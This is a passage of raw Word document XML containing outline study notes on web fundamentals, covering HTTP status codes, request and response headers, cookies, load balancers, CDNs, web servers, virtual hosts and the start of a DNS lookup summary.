    <w:p w14:paraId="224DBCD2" w14:textId="4D59E42D" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>400-499 – client errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C936286" w14:textId="6F6A3BB1" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>500-599 – server errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5980F367" w14:textId="58A7F417" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Common HTTP Status Codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4C07B9" w14:textId="73A3A75C" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>200 – ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F737145" w14:textId="1890914F" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>201 – created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C9D44" w14:textId="57C270A2" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>301 – permanent redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5967DBDB" w14:textId="4E5CF6F4" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>302 – temporary redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7AC99A" w14:textId="7BCFA3AC" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>400 – bad request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C70268" w14:textId="4F9E1393" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>401 – not authorized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E61DBB8" w14:textId="19B5BC32" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>403 – forbidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240EC468" w14:textId="6105FD73" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>405 – method not allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD91BEA" w14:textId="65305387" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>404 – page not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A014028" w14:textId="14789823" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>500 – internal service error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71713B1F" w14:textId="6DA9DDB1" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>503 – service unavailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AAC9A9" w14:textId="4226C53F" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6469D787" w14:textId="6847B40A" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Common Request Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABD232C" w14:textId="60616185" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Host – tells server which website is requested, otherwise will receive default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E71C3D" w14:textId="6620A5A1" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>User-Agent – tells web server browser software helps format website properly for HTML, JS, CSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7F0F85" w14:textId="78C122FA" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Length – tells web server how much data to expect in the web request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2467BDD8" w14:textId="738BAD77" w:rsidR="00CA567A" w:rsidRDefault="00CA567A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accept-Encoding </w:t>
      </w:r>
      <w:r w:rsidR="0004060B">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0004060B">
        <w:t>tells server types of compression methods browser supports so data can be made smaller for transmission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508AB523" w14:textId="5985E5A4" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cookie – remembers important information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C7A35E" w14:textId="61B721CF" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Common Response Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4998DD29" w14:textId="22707BCF" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Set-Cookie – information stored to be sent back to web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504A8BDD" w14:textId="515D6326" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cache-Control – how long to store the content of response in browser cache before requesting again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B18858" w14:textId="747F15D7" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Type – what type of data is being returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75CDFF" w14:textId="3348E10F" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Content-Encoding – method used to compress the data to make it smaller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEEBE0D" w14:textId="20BD6D44" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E159755" w14:textId="10C753E4" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>saved when receive a Set-Cookie header from a web server because HTTP is stateless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E9FF3C" w14:textId="2B0AFDBF" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can be used for website authentication via tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB55962" w14:textId="364B02C2" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Viewing Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B59E12" w14:textId="1AD281C5" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>developer tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C92029" w14:textId="35920636" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>network tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0511D2" w14:textId="072F5C8A" w:rsidR="0004060B" w:rsidRDefault="0004060B" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cookies tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFDDB2C" w14:textId="697F55C8" w:rsidR="002F31CF" w:rsidRDefault="002F31CF" w:rsidP="002F31CF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Other Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229F356B" w14:textId="473BE356" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Additional Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550ABA2A" w14:textId="6007B45D" w:rsidR="002F31CF" w:rsidRDefault="002F31CF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Load Balancers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E68492" w14:textId="5A34908D" w:rsidR="002F31CF" w:rsidRDefault="002F31CF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>high availability via failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A60F1" w14:textId="67AD1D77" w:rsidR="002F31CF" w:rsidRDefault="002F31CF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>round-robin or weighted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77504E52" w14:textId="44296365" w:rsidR="002F31CF" w:rsidRDefault="002F31CF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>health checks are also performed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D6E081" w14:textId="024E2A11" w:rsidR="002F31CF" w:rsidRDefault="002F31CF" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Content Delivery Network (CDN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB08A93" w14:textId="7865B5B6" w:rsidR="002F31CF" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>assists in traffic reduction, host static files across numerous servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F90239" w14:textId="17511151" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>files are returned to requestee by physical proximity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C121CDB" w14:textId="779DC8EC" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3208A1" w14:textId="3721A4A5" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B60E02" w14:textId="75E9FF16" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>How Web Servers Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEBECB9" w14:textId="582A5964" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>What is a Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB43774" w14:textId="7B07EE7D" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>listens for incoming connections and uses HTTP to deliver web content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A55337C" w14:textId="21F91538" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Apache, Nginx, IIS, NodeJS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAFC6C1" w14:textId="5D80B1F9" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Delivers files from root directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3881F0" w14:textId="741C51E2" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nginx/Apache - /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7E3100" w14:textId="5863C438" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>IIS – C:\inetpub\wwwroot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066B8285" w14:textId="31E28CF6" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Virtual Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B46869E" w14:textId="370D6688" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>host multiple websites with different domain names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18233894" w14:textId="4E9CB8B8" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>checks hostname being requested from the HTTP headers and matches against virtual hosts (text-based config files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D674641" w14:textId="231152ED" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Static vs Dynamic Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA70432" w14:textId="4A1FDE40" w:rsidR="009407F0" w:rsidRDefault="009407F0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pictures, JS, CSS</w:t>
      </w:r>
      <w:r w:rsidR="00A66E3F">
        <w:t xml:space="preserve"> – static – doesn’t change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439E23E7" w14:textId="11DF1673" w:rsidR="00A66E3F" w:rsidRDefault="00A66E3F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dynamic content changes depending on requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D0648" w14:textId="6886F776" w:rsidR="00A66E3F" w:rsidRDefault="00A66E3F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Scripting and Backend Languages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B58B47" w14:textId="4A3ECC0D" w:rsidR="00A66E3F" w:rsidRDefault="00A66E3F" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PHP, Python, Ruby, NodeJS, Perl, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6626E6E9" w14:textId="31ACCBE4" w:rsidR="00BF1F9C" w:rsidRDefault="00BF1F9C" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D16A565" w14:textId="26EDBF0A" w:rsidR="00BF1F9C" w:rsidRDefault="00FE15B2" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>make a request in browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C69E94" w14:textId="6B1DDA29" w:rsidR="00FE15B2" w:rsidRDefault="00FE15B2" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check local cache for IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73474842" w14:textId="419E4630" w:rsidR="00FE15B2" w:rsidRDefault="00FE15B2" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check recursive DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF774DA" w14:textId="4CC82C82" w:rsidR="00FE15B2" w:rsidRDefault="00FE15B2" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>query root server to find authoritative DNS server</w:t>
      </w:r>
